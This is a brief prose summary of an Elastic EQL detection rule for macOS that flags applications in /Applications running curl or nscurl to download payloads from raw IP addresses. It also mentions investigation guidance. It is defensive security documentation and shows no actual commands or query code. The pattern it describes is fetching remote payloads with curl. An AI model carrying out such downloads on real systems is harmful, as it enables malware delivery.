This detection rule is designed to identify suspicious executions of the 'curl' command by macOS applications, particularly when those applications attempt to download payloads from raw IP addresses. Such behavior is indicative of malicious activities, especially when considering that threat actors often disguise their malicious payloads within benign-looking applications. The rule utilizes the Elastic EQL (Event Query Language) and monitors process events related to the execution of 'curl' or 'nscurl' commands. It checks for process arguments that suggest file downloads directed toward IP addresses, which could then lead to the retrieval of malicious payloads. The detection is focused on processes originating from the '/Applications' directory to ensure that it captures potential incidents while minimizing false positives from legitimate application behaviors, such as software updates or known, benign operations. Recommendations for investigation are also provided, highlighting important contextual information to analyze for proper response actions.